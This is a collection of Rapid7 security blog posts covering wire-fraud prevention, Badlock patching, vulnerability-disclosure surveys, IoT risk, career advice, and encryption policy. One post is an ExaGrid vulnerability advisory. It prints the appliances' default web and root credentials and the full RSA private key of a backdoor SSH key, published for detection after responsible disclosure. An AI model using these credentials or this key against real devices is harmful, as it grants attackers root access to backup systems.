All this time no one thought to actually verify the request, and this was not part of the process at that time. But because the approver was uncooperative with the request, it was escalated to the CFO, because the CEO was traveling, and he suspected it was fraudulent, and contacted me. We determined almost immediately it was fake, just by looking at email headers. There were other indicators too.

 

I immediately praised everyone involved, and bought them gifts for sticking to the process. The director might have felt ashamed, but I went to her as well and explained that these scams are successful because they count on stress and distraction to occur. These are normal human behaviors, and they sometimes cause us to act erratically. But because we had a firm process that was adhered to, all we lost was time.

 

There’s actually much more to this story, but I’ll save that for future posts.

 

Regardless of your organizations size or structure, you too can put this in place. If you are unsure these processes exist, start asking around. Begin with your controllers or comptrollers, or anyone in finance. Ask if you have a process for wire transfers, and if so what the process is. Get involved, understand how your business does business. This will benefit you in many ways.

 

Other things you can do:

 

  • Join Infragard, the FBI and civilian alliance, which will get you in depth resources and information. You can also report fraud to the IC3, The Internet Crime Complaint Center.
  • Ensure you have a separation of duties policy that is enforced
  • Periodically train / update awareness of these issues with the people involved

 

All these are free, requiring only a time investment, and will go a long way toward avoiding the kind of wire transfer fraud scam the FBI is warning about.

Today is Badlock Day

badlock-not-really.JPGYou may recall that the folks over at badlock.org stated about 20 days ago that April 12 would see patches for "Badlock," a serious vulnerability in the SMB/CIFS protocol that affects both Microsoft Windows and any server running Samba, an open source workalike for SMB/CIFS services. We talked about it back in our Getting Ahead of Badlock post, and hopefully, IT administrators have taken advantage of the pre-release warning to clear their schedules for today's patching activities.

 

For Microsoft shops, this should have been straightforward, since today is also Microsoft Patch Tuesday. Applying critical Microsoft patches is, after all, a pretty predictable event.

 

For administrators of servers that run other operating systems that also happen to offer Samba, we've all had a rough couple years of (usually) coordinated disclosures and updates around core system libraries, so this event can piggyback on those established procedures.

 

How worried should I be?

While we do recommend you roll out the patches as soon as possible - as we generally do for everything - we don't think Badlock is the Bug To End All Bugs[TM]. In reality, an attacker has to already be in a position to do harm in order to use this, and if they are, there are probably other, worse (or better depending on your point of view) attacks they may leverage.

 

Badlock describes a Man-in-the-Middle (MitM) vulnerability affecting both Samba's implementation of SMB/CIFS (as CVE-2016-2118) and Microsoft's (as CVE-2016-0128). This is NOT a straightforward remote code execution (RCE) vulnerability, so it is unlike MS08-067 or any of the historical RCE issues against SMB/CIFS. More details about Badlock and the related issues can be found over at badlock.org.

 

The most likely attack scenario is an internal user who is in the position of intercepting and modifying network traffic in transit to gain privileges equivalent to the intercepted user. While some SMB/CIFS servers exist on the Internet, this is generally considered poor practice, and should be avoided anyway.

 

What's next?

For Samba administrators, the easy advice is to just patch up now. If you're absolutely sure you're not offering CIFS/SMB over the Internet with Samba, check again. Unintentionally exposed services are the bane of IT security after all, with the porous nature of network perimeters.

 

While you're checking, go ahead and patch, since both private and public exploits will surface eventually. You can bet that exploit developers around the world are poring over the Samba patches now. In fact, you can track public progress over at the Metasploit Pull Request queue, but please keep your comments technically relevant and helpful if you care to pitch in.

 

For Microsoft Windows administrators, Badlock is apparently fixed in MS16-047. While Microsoft merely rates this as "Important," there are plenty of other critically rated issues released today, so IT organizations are advised to use their already-negotiated change windows to test and apply this latest round of patches.

 

Rapid7 will be publishing both Metasploit exploits and Nexpose checks just as soon as we can, and this post will be updated when those are available. These should help IT security practitioners to identify their organizations' threat exposure on both systems that are routinely kept up to date, as well as those systems that are IT's responsibility but are, for whatever reason, outside of IT's direct control.

 

Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Maybe I’m being cynical, but I feel like that may well be the thought that a lot of people have when they hear about two surveys posted online this week to investigate perspectives on vulnerability disclosure and handling. Yet despite my natural cynicism, I believe these surveys are a valuable and important step towards understanding the real status quo around vulnerability disclosure and handling so the actions taken to drive adoption of best practices will be more likely to have impact.

 

Hopefully this blog will explain why I feel this way. Before we get into it, here are the surveys:

 

A little bit of background…

 

In March 2015, the National Telecommunications and Information Administration (NTIA) issued a request for comment to “identify substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers.” Based on the responses they received, they then announced that they were convening a “multistakeholder process concerning collaboration between security researchers and software and system developers and owners to address security vulnerability disclosure.”

 

This announcement was met by the deafening sound of groaning from the security community, many of whom have already participated in countless multistakeholder processes on this topic. The debate around vulnerability disclosure and handling is not new, and it has a tendency to veer towards the religious, with security researchers on one side, and technology providers on the other. Despite this, there have been a number of good faith efforts to develop best practices so researchers and technology providers can work more productively together, reducing the risk on both sides, as well as for end-users. This work has even resulted in two ISO standards (ISO 29147 & ISO 30111) providing vulnerability disclosure and handling best practices for technology providers and operators. So why did the NTIA receive comments proposing this topic?  And of all the things proposed, why did they pick this as their first topic?

 

In my opinion, it’s for two main, connected reasons.

 

Firstly, despite all the phenomenal work that has gone into developing best practices for vulnerability disclosure and handling, adoption of these practices is still very limited. Rapid7 conducts quite a lot of vulnerability disclosures, either for our own researchers, or on occasion for researchers in the Metasploit community that don’t want to deal with the hassle.  Anecdotally, we reckon we receive a response to these disclosures maybe 20% of the time. The rest of the time, it’s crickets. In fact, at the first meeting of the NTIA process in Berkeley, Art Manion of the CERT Coordination Center commented that they’ve taken to sending registered snail mail as it’s the only way they can be sure a disclosure has been received.  It was hard to tell if that’s a joke or true facts.

 

So adoption still seems to be a challenge, and maybe some people (like me) hope this process can help. Of course, the efforts that went before tried to drive adoption, so why should this one be any different?

 

This brings me to the second of my reasons for this project, namely that the times have changed, and with them the context. In the past five years, we’ve seen a staggering number of breaches reported in the news; we’ve seen high-profile branded vulnerability disclosures dominate headlines and put security on the executive team’s radar. We’ve seen bug bounties starting to be adopted by the more security-minded companies. And importantly, we’ve seen the Government start to pay attention to security research – we’ve seen that in the DMCA exemption recently approved, the FDA post-market guidance being proposed, the FTC’s presence at DEF CON, the Department of Defense’s bug bounty, and of course, in the very fact that the NTIA picked this topic. None of these factors alone creates a turn of the tide, but combined, they just might provide an opportunity for us to take a step forward.

 

And that’s what we’re talking about here – steps. It’s important to remember that complex problems are almost never solved overnight. The work done in this NTIA process builds on work conducted before: for example the development of best practices; the disclosure of vulnerability research; efforts to address or fix those bugs; the adoption of bug bounties. All of these pieces make up a picture that reveals a gradual shift in the culture around vulnerability disclosure and handling. Our efforts, should they yield results, will also not be a panacea, but we hope they will pave the way for other steps forward in the future.

 

OK, but why do we need surveys?

 

As I said above, discussions around this tend to become a little heated, and there’s not always a lot of empathy between the two sides, which doesn’t make for great potential for finding resolution. A lot of this dialogue is fueled by assumptions.

My experience and resulting perspective on this topic stems from having worked on both sides of the fence – first as a reputation manager for tech companies (where my reaction to a vulnerability disclosure would have been to try to kill it with fire); and then more recently I have partnered with researchers to get the word out about vulnerabilities, or have coordinated Rapid7’s efforts to respond to major disclosures in the community. At different points I have responded with indignation on behalf of my tech company client, who I saw as being threatened by those Shady Researcher Types, and then later on behalf of my researcher friends, who I have seen threatened by those Evil Corporation Types. I say that somewhat tongue-in-cheek, but I do often hear that kind of dialogue coming from the different groups involved, and much worse besides. There are a lot of stereotypes and assumptions in this discussion, and I find they are rarely all that true.

 

I thought my experience gave me a pretty good handle on the debate and the various points of view I would encounter. I thought I knew the reality behind the hyperbolic discourse, yet I find I am still surprised by the things I hear.

 

For example, it turns out a lot of technology providers (both big and small) don’t think of themselves as such and so they are in the “don’t know what they don’t know” bucket. It also turns out a lot of technology operators are terrified of being extorted by researchers. I’ve been told that a few times, but had initially dismissed it as hyperbole, until an incredibly stressed security professional working at a non-profit and trying to figure out how to interpret an inbound from a researcher contacted me asking for help. When I looked at the communication from the researcher, I could absolutely understand his concern.

 

On the researcher side, I’ve been saddened by the number of people that tell me they don’t want to disclose findings because they’re afraid of legal threats from the vendor. Yet more have told me they see no point in disclosing to vendors because they never respond.  As I said above, we can relate to that point of view! At the same time, we recently disclosed a vulnerability to Xfinity, and missed disclosing through their preferred reporting route (we disclosed to Xfinity addresses, and their recommendation is to use abuse@comcast.net).  When we went public, they pointed this out, and were actually very responsive and engaged regarding the disclosure. We realized that we’ve become so used to a lack of response from vendors that we stopped pushing ourselves to do everything we can to get one. If we care about reaching the right outcome to improve security – and we do – we can’t allow ourselves to become defeatist.

 

My point here is that assumptions may be based on past experience, but that doesn’t mean they are always correct, or even still correct in the current context. Assumptions, particularly erroneous ones, undermine our ability to understand the heart of the problem, which reduces our chances of proposing solutions that will work. Assumptions and stereotypes are also clear signs of a lack of empathy. How will we ever achieve any kind of productive collaboration, compromise, or cultural evolution if we aren’t able or willing to empathize with each other?  I rarely find that anyone is motivated by purely nefarious motives, and understanding what actually does motivate them and why is the key to informing and influencing behavior to effect positive change.  Even if in some instances it means that it’s your own behavior that might change J

 

So, about those surveys…

 

The group that developed the surveys – the Awareness and Adoption Group participating in the NTIA process (not NTIA itself) – is comprised of a mixture of security researchers, technology providers, civil liberties advocates, policy makers, and vulnerability disclosure veterans and participants. It’s a pretty mixed group and it’s unlikely we all have the same goals or priorities in participating, but I’ve been very impressed and grateful that everyone has made a real effort to listen to each other and understand each other’s points of view. Our goal with the surveys is to do that on a far bigger scale so we can really understand a lot more about how people think about this topic. Ideally we will see responses from technology providers and operators, and security researchers that would not normally participate in something like the NTIA process as they are the vast majority and we want to understand their (your?!) perspectives. We’re hoping you can help us defeat any assumptions we may have - the only hypothesis we hope to prove out here is that we don’t know everything and can still learn.

 

So please do take the survey that relates to you, and please do share them and encourage others to do likewise:

 

Thank you!

@infosecjen

Recently I transitioned from a Principal Consultant role into a new role at Rapid7, as Research Lead with a focus on IoT technology, and it has been a fascinating challenge. Although I have been conducting research for a number of years, covering everything from Format string and Buffer overflow research on Windows applications to exploring embedded appliance and hacking multifunction printers (MFP), conducting research within the IoT world is truly exciting and amazing and has taught me to be even more open minded.

 

That is, open minded to the fact that there are people out there attaching technology to everything and anything. (Even toothbrushes.)

 

oralb-bluetooth.png

 

As a security consultant, over the last eight years I have focused most of my research on operational style attacks, which I have developed and used to compromise systems and data during penetration testing. The concept of operational attacks is the process of using the operational features of a device against itself.

 

As an example, if you know how to ask nicely, MFPs will often give up Active Directory credentials, or as recent research has disclosed, network management systems openly consume SNMP data without questioning its content or where it came from.

 

IoT research is even cooler because now I get the chance to expand my experience into a number of new avenues. Historically I have prided myself in the ability to define risk around my research and communicate it well. With IoT, I initially shuddered at the question: “How do I define Risk?"

 

IoT Risk

In the past, it has been fairly simple to define and explain risk as it relates to operational style attacks within an enterprise environment, but with IoT technology I initially struggled with the concept of risk. This was mainly driven by the fact that most IoT technologies appear to be consumer-grade products. So if someone hacks my toothbrush they may learn how often I brush my teeth. What is the risk there, and how do I measure that risk?

 

The truth is, the deeper I head down this rabbit hole called IoT, the better my understanding of risk grows. A prime example of defining such risk was pointed out by Tod Beardsley in his blog “The Business Impact of Hacked Baby Monitors”. On the first look, we might easily jump to the conclusion that there may not be any serious risk to an enterprise business. But on second take, if a malicious actor can use some innocuous IoT technology to gain a foothold to the home network of one of your employees, they could then potentially pivot onto the corporate network via remote access, such a VPN. This is a valid risk that can be communicated and should be seriously considered.

 

IoT Research

To better define risk, we need to ensure our research involves all aspect of IoT technology. Often when researching and testing IoT, researchers can get a form of tunnel vision where they focus on the technology from a single point of reference, as an example, the device itself.

 

While working and discussing IoT technology with my peers at Rapid7, I have grown to appreciate the complexity of IoT and its ecosystem. Yes, ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology. This includes the three following categories and how each one of these categories interacts and impacts each of the other categories. We cannot test one without the other and consider that testing effective.  We must test each one and also test how they affect each other.

 

ecosystem.png

 

With IoT quickly becoming more than just consumer-grade products, we are starting to see more IoT-based technologies migrating into the enterprise environment. If we are ever going to build a secure IoT world, it is critical during our research that all aspects of the ecosystem are addressed.

 

The knowledge we learn from this research can help enterprises better cope with the new security risk, make better decisions on technology purchases, and help employees stay safe within their home environment—which leads to better security for our enterprises. Thorough research can also deliver valuable knowledge back to the vendors, making it possible to improve product security during the design, creation, and manufacturing of IoT technology, so new vendors and new products are not recreating the same issues over and over.

 

So, as we continue down the road of IoT research, let us focus our efforts on the entire ecosystem. That way we can assure that our efforts lead to a complete picture and culminate in security improvements within the IoT industry.

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

2016 marks the 15th year that I have been working for myself as an independent information security consultant. People who are interested in working for themselves often ask for my thoughts on what it takes to go out - and stay out - on your own. Early on, I thought it was about business cards and marketing slicks. In fact, I spent so much time, effort, and money on company tchotchkes that I'm confident I could have earned twice as much money in my first year alone had I focused on what was truly important. I soon found out that starting my information security consulting practice wasn't about "things". Instead, I saw the value of networking and surrounding myself with successful people – people that I could learn not only about information security but, more importantly, what it takes to be successful in business.

 

In what ways does this apply to your career in IT and information security? Every way! If you look at the essence of what it takes to be successful in our field, it's not about being a master of the technical stuff. Anyone can learn those things. Sure, some are better than others, but at the end of the day, the technical challenges are not our real challenges. Instead, it's about being able to master emotional intelligence including, among other things, the relationships we have with people who are in a position to both help us and hurt us. The relationships you have with others has an enormous impact on how effective you can be in your job and how far you can go in your career.

 

You certainly don’t have to work for yourself to benefit from this. Whether you work for a large corporation, a small startup, a government agency or a nonprofit, think about who you currently know and who you should get to know that can have a positive influence on your IT/security career. It might be a current executive in your own organization. It might be a fellow IT pro, auditor, or entrepreneur you meet at a security conference. It might be the parent of your child’s friend who’s an attorney or a doctor. It might be someone else in the information security field who you could reach out to on LinkedIn to start having a dialog with. There are a lot of people – many of which you probably haven’t thought about – who can help you out in tremendous ways. Not to make money off of but to learn from and collaborate. This leads me to an important point: whenever you are reaching out and meeting new people, make sure that you are also giving to this person in some capacity. The last thing anyone wants is a user of their relationship with nothing in return.

 

Looking back, the first few years of starting my business I should have spent surrounding myself with people in/around IT as well as those who were in a position to coach and mentor me along to be a better business person. This would've created more opportunities for me earlier on than anything else. As recently as a few weeks ago, I interacted with a young salesman who was more concerned about whether I had a marketing brochure rather than getting to know
me and understanding how I might be able to help him with his information security needs (he was hoping to sell my services to his clients). This is a common approach to one’s career: have a beautiful marketing slick or website and
they will come, and buy. If it were that simple, countless people would be super successful in every field. Instead, it takes persistence, year after year. Work on building and maintaining your relationships both inside and outside of your
organization as that’s what will help you succeed the most in your IT and security endeavors long-term.

The following issues affect ExaGrid storage devices running firmware prior to version 4.8 P26:

 

CVE-2016-1560: The web interface ships with default credentials of 'support:support'. This credential confers full control of the device, including running commands as root. In addition, SSH is enabled by default and remote root login is allowed with a default password of 'inflection'.

 

CVE-2016-1561: Two keys are listed in the root user's .ssh/authorized_keys file: one labeled "ExaGrid support key" and one "exagrid-manufacturing-key-20070604". A copy of the private key for the latter authorized key ships on the device in /usr/share/exagrid-keyring/ssh/manufacturing.

 

These issues have been rectified in firmware version 4.8 P26, available from the vendor.

 

Credit

Discovered by James @egyp7 Lee of Rapid7, Inc., and disclosed to the vendor and CERT per Rapid7's disclosure policy.

 

Product Description

ExaGrid provides a series of disk backup appliances based on Linux. The vendor's website states, "ExaGrid's appliances are deduplication storage targets for all industry leading backup applications." In addition, ExaGrid provides several hundred customer testimonials, demonstrating its popularity as a backup solution across several vertical markets.

 

Exploitation

Exploiting these issues require a standard ssh client for the first two issues, and a standard web browser with the third.

 

The SSH private key, which is common to every shipping device, is located on the device at /usr/share/exagrid-keyring/ssh/manufacturing, available to anyone who owns a device or anyone who can download and extract the firmware.

 

In order to facilitate detection of this exposure, the private key is provided below.

 

Fingerprints

MD5:22:c8:a9:c3:01:a0:17:31:a5:43:f2:70:4a:1c:55:f6

SHA1:1szdeYNwqO2Jom6rby+RTybD9cA

 

Public Key

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBnZQ+6nhlPX/JnX5i5hXpljJ89bSnnrsSs51hSPuoJGmoKowBddIS K7s10AIpO0xAWGcr8PUr2FOjEBbDHqlRxoXF0Ocms9xv3ql9EYUQ5+U+M6BymWhNTFPOs6gFHUl8Bw3t 6c+SRKBpfRFB0yzBj9d093gSdfTAFoz+yLo4vRw==

 

Private Key

-----BEGIN RSA PRIVATE KEY-----

MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10

hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa

E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA

GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ

BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg

AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y

iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs

Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj

QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz

ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG

XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk

86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y

x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==

-----END RSA PRIVATE KEY-----

 

Mitigations

Removing the two backdoor keys from /root/.ssh/authorized_keys and /root/.ssh/authorized_keys2 files and changing the root user's password will prevent exploitation of the first vulnerability.

 

As for the web UI exposure, it appears to be possible to change the password for the 'support' account through the web interface. However, this is likely to break software updates as the update process uses that account with a hard coded password.

 

Vendor Response

The vendor has fixed the reported vulnerabilities in firmware version 4.8 P26. Customers are urged to contact their support representative to acquire this firmware update.

 

"ExaGrid prides itself on meeting customer requirements," said Bill Andrews, CEO of ExaGrid. "Security is without question a top priority, and we take any such issues very seriously. When we were informed by Rapid7 of a potential security weakness, we addressed it immediately. We value Rapid7's involvement in identifying security risks since strong security will always be a key customer requirement."

 

Disclosure Timeline

This vulnerability advisory was prepared and released in accordance with Rapid7's disclosure policy.

 

  • Tue, Jan 26, 2016: Initial discovery by James Lee of Rapid7
  • Fri, Jan 29, 2016: Initial contact to vendor
  • Mon, Feb 01, 2016: Response from vendor and details disclosed
  • Mon, Feb 23, 2016: Disclosure to CERT
  • Tue, Mar 08, 2016: Vendor commits to a patch release in March.
  • Thu, Mar 24, 2016: Vendor provides an updated firmware image
  • Thu, Apr 07, 2016: Public disclosure and Metasploit module published.

A major area of focus in the current cybersecurity policy discussion is how growing adoption of encryption impacts law enforcement and national security, and whether new policies should be developed in response. This post briefly evaluates several potential outcomes of the debate, and provides Rapid7's current position on each.

 

Background

 

Rapid7 has great respect for the work of our law enforcement and intelligence agencies. As a cybersecurity company that constantly strives to protect our clients from cybercrime and industrial espionage, we appreciate law enforcement's role in deterring and prosecuting wrongdoers. We also recognize the critical need for effective technical tools to counter the serious and growing threats to our networks and personal devices. Encryption is one such tool.

 

Encryption is a fundamental means of protecting data from unauthorized access or use. Commerce, government, and individual internet users depend on strong security for our communications. For example, encryption helps prevent unauthorized parties from reading sensitive communications – like banking or health information – traveling over the internet. Another example: encryption underpins certificates that demonstrate authenticity (am I who I say I am?), so that we can have high confidence that a digital communication – such as a computer software security update – is coming from the right source and not a man-in-the-middle attacker. The growing adoption of encryption for features like these has made users much more safe than we would be without it. Rapid7 believes companies and technology innovators should be able to use the encryption protocols that best protect their customers and fit their service model – whether that protocol is end-to-end encryption or some other system.

 

However, we also recognize this increased data security creates a security trade-off. Law enforcement will at times encounter encryption that it cannot break by brute force and for which only the user – not the software vendor – has the key, and this will hinder lawful searches. The FBI's recently concluded efforts to access the cell phone belonging to deceased terrorist Syed Farook of San Bernardino, California, was a case study in this very issue. Although the prevalence of systems currently secured with end-to-end encryption with no other means of access should not be overstated, law enforcement search attempts may be thwarted more often as communications evolve to use unbreakable encryption with greater frequency. This prospect has tempted government agencies to seek novel ways around encryption. While we do not find fault with law enforcement agencies attempting to execute valid search or surveillance orders, several of the options under debate for circumventing encryption pose broad negative implications for cybersecurity.

 

Weakening encryption

 

One option under discussion is a legal requirement that companies weaken encryption by creating a means of "exceptional access" to software and communications services that government agencies can use to unlock encrypted data. This option could take two forms – one in which the government agencies hold the decryption keys (unmediated access), and one in which the software creator or another third party holds the decryption keys (mediated access). Both models would impose significant security risks for the underlying software or service by creating attack surfaces for bad actors, including cybercriminals and unfriendly international governments. For this reason, Rapid7 does not support a legal requirement for companies or developers to undermine encryption for facilitating government access to encrypted data.

 

The huge diversity of modern communications platforms and software architecture makes it impossible to implement a one-size-fits-all backdoor into encryption. Instead, to comply with a hypothetical mandate to weaken encryption, different companies are likely to build different types of exceptional access. Some encryption backdoors will be inherently more or less secure than others due to technical considerations, the availability of company resources to defend the backdoor against insider and external threats, the attractiveness of client data to bad actors, and other factors. The resulting environment would most likely be highly complex, vulnerable to misuse, and burdensome to businesses and innovators.

 

Rapid7 also shares concerns that requiring US companies to provide exceptional access to encrypted communications for US government agencies would lead to sustained pressure from many jurisdictions – both local and worldwide – for similar access. Companies or oversight bodies may face significant challenges in accurately tracking when, by whom, and under what circumstances client data is accessed – especially if governments have unmediated access to decryption keys. If US products are designed to be inherently insecure and "surveillance-ready," then US companies will face a considerable competitive disadvantage in international markets where more secure products are available.

 

Legal mandates to weaken encryption are unlikely to keep unbreakable encryption out of the hands of well-resourced criminals and terrorists. Open source software is commonly "forked," and it should be expected that developers will modify open source software to remove an encryption backdoor. Jurisdictions without an exceptional access requirement could still distribute closed source software with unbreakable encryption. As a result, the cybersecurity risks of weakened encryption are especially likely to fall on users who are not already security-conscious enough to seek out these workarounds.

 

Intentionally weakening encryption or other technical protections ultimately undermines the security of the end users, businesses, and governments. That said, if companies or software creators voluntarily choose to build exceptional access mechanisms into their encryption, Rapid7 believes it is their right to do so. However, we would not recommend doing so, and we believe companies and creators should be as transparent as possible with their users about any such feature.

 

"Technical assistance" – compelled malware

 

Another option under debate is whether the government can force developers to build custom software that removes security features of the developers' products. This prospect arose in connection with the FBI's now-concluded bid to unlock Farook's encrypted iPhone to retrieve evidence for its terrorism investigation. In that case, a magistrate judge ordered Apple to develop and sign a custom build of iOS that would disable several security features preventing the FBI from using electronic means to quickly crack the phone's passcode via brute force. This custom version of iOS would have been deployed like a firmware update only to the deceased terrorist's iPhone, and Apple would have maintained control of both the iPhone and the custom iOS. However, the FBI ultimately cracked the iPhone without Apple's assistance – with help, according to some reports, from a third party company – and asked the court to vacate its order against Apple. Still, it's possible that law enforcement agencies could again attempt to legally compel companies to hack their own products in the future.

 

In the Farook case, the government had good reason to examine the contents of the iPhone, and clearly took steps to help prevent the custom software from escaping into the wild. This was not a backdoor or exceptional access to encryption as traditionally conceived, and not entirely dissimilar to cooperation Apple has offered law enforcement in the past for unencrypted older versions of iOS. Nonetheless, the legal precedent that would be set if a court compels a company or developer to create malware to weaken its own software could have broad implications that are harmful to cybersecurity.

 

FBI Director James Comey confirmed in testimony before Congress that if the government succeeded in court against Apple, law enforcement agencies would likely use the precedent as justification to demand companies create custom software in the future. It's possible the precedent could be applied to a prolonged wiretap of users of an encrypted messaging service like WhatsApp, or a range of other circumstances. Establishing the limits of this authority would be quite important.

 

If the government consistently compelled companies to create custom software to undermine the security of their own products, the effect could be proliferation of company-created malware. Companies would need to defend their malware from misuse by both insiders and external threats while potentially deploying the malware to comply with many government demands worldwide, which – like defending an encryption backdoor – would be considerably burdensome on companies. This outcome could reduce user trust in the security of vendor-issued software updates, even though it is generally critical for cybersecurity for users to keep their software as up to date as possible. Companies may also design their products to be less secure from the outset, in anticipation of future legal orders to circumvent their own security.

 

These scenarios raise difficult questions for cybersecurity researchers and firms like Rapid7. Government search and surveillance demands are frequently paired with gag orders that forbid the recipient (such as the individual user or a third party service provider) from discussing the demands. Could this practice impact public disclosure or company acknowledgment of a vulnerability when researchers discover a security flaw or threat signature originating from software a company is compelled to create for law enforcement? When would a company be free to fix its government-ordered vulnerability? Would cybersecurity firms be able to wholeheartedly recommend clients accept vendor software updates?

 

Rapid7 does not support legal requirements – whether via legislation or court order – compelling companies to create custom software to degrade security. Creating secure software is very difficult under the best of circumstances, and forcing companies to actively undermine their own security features would undo decades of security learnings and practice. If the government were to compel companies to provide access to its products, Rapid7 believes it would be preferable to use tools already available to the companies (such as that which Apple offered prior to iOS 8) in limited circumstances that do not put non-targeted users at risk. If a company has no means to crack its products already available, the government should not compel a company to create custom software to undermine their products' security features. Software developers should also be free to develop patches or introduce more secure versions of their products to fix vulnerabilities at any time.

 

Government hacking and forensics

 

Finally, there is the option of government deploying its own tools to hack products and services to obtain information. End-to-end encryption provides limited protection when one of the endpoints is compromised. If government agencies do not compel companies to weaken their own products, they could exploit existing vulnerabilities themselves. As noted above, the government's exploitation of existing vulnerabilities was the outcome of the FBI's effort to compel Apple to provide access to Farook's iPhone. Government has also turned to hacking or implanting malware in other contexts well before the Farook case.

 

In many ways, this activity is to be expected. It is not an irrational priority for law enforcement agencies to modernize their computer penetration capabilities to be commensurate with savvy adversaries. A higher level of hacking and digital forensic expertise for law enforcement agencies should improve their ability to combat cybercriminals more generally. However, this approach raises its own set of important questions related to transparency and due process.

 

Upgrading the technological expertise of law enforcement agencies will take time, education, and resources. It will also require thoughtful policy discussions on what the appropriate rules for government hacking should be – there are few clear and publicly available standards for government use of malware. One potentially negative outcome would be government stockpiling of zero day vulnerabilities for use in investigations, without disclosing the vulnerabilities to vendors or the public. The picture is clouded further when the government partners with third party organizations to hack on the government's behalf, as may have occurred in the case of Farook's iPhone – if the third party owns a software exploit, could IP or licensing agreements prevent the government from disclosing the vulnerability to the vendor? White House Cybersecurity Coordinator Michael Daniel noted there were "few hard and fast rules" for disclosing vulnerabilities, but pointed out that zero day stockpiles put Internet users at risk and would not be in the interests of national security. We agree and appreciate the default of vulnerability disclosure, but clearer rules on transparency and due process in the context of government hacking are quickly becoming increasingly important.

 

No easy answers

 

We view the complex issue of encryption and law enforcement access as security versus security. To us, the best path forward is that which would provide the best security for the most number of individuals. To that end, Rapid7 believes that we should embrace the use of strong encryption without compelling companies to create software that undermines their product security features. We want the government to help prevent crime by working with the private sector to make communications services, commercial products, and critical infrastructure trustworthy and resilient. The foundation of greater cybersecurity will benefit us all in the future.

 

 

Harley Geiger

Director of Public Policy, Rapid7

todb

Getting Ahead of Badlock

Posted by todb Employee Mar 30, 2016

badlock-tay-selly.jpgWhile we are keeping abreast of the news about the foretold Badlock vulnerability, we don't know much more than anyone else right now. We're currently speculating that the issue has to do with the fundamentals of the SMB/CIFS protocol, since the vulnerability is reported to be present in both Microsoft's and Samba's implementations. Beyond that, we're expecting the details from Microsoft as part of their regularly scheduled patch Tuesday.

 

How Bad Is It?

Microsoft and the Samba project both clearly believe this is a more critical than usual problem, but in the end, it's almost certainly limited to SMB/CIFS, much like MS08-067 was. This comparison should be alternatively comforting and troubling. While the SMB world isn't the same as it was in late 2008, MS08-067 continues to be a solid, bread and butter vulnerability exploited by internal penetration testers. We are very concerned about the population of chronically unpatched SMB/CIFS servers that lurk in the dusty corners of nearly every major IT enterprise.

 

What Can I Do Now?

Any large organization with a significant install base of Windows servers should take this time clearing patch and reboot schedules for production SMB/CIFS servers using their usual Patch Tuesday change control processes. Assuming it's even remotely as bad as the discoverers are making it out to be, this is the patch you want to release into production pretty much as fast as your change control processes allow. Therefore, given the high visibility of this particular issue, it would be wise to treat it as a mostly predictable emergency.

 

In the event you feel like you're set up for a rapid patch deployment, this is also a pretty great time to conduct an assessment of both your intentional and accidental SMB/CIFS footprint. While Windows machines today ship with an operating system-level firewall by default, all too often, users will "temporarily" disable these protections in order to get some specific file sharing task done, and there's really nothing more permanent in an IT environment than a temporary workaround.

 

In short, our advice is take advantage of the hype around this bug, and buy some time from your management to get some legwork done in advance of next Patch Tuesday. You might be surprised with what you find, but it's better to discover those rogue SMB/CIFS endpoints now, in a measured way, than during a panic-fueled crisis. And if you haven't exercised your emergency patch procedures in a while, well, now you have every excuse you could ask for, short of an actual, unplanned emergency.

Filter Blog

By date: By tag: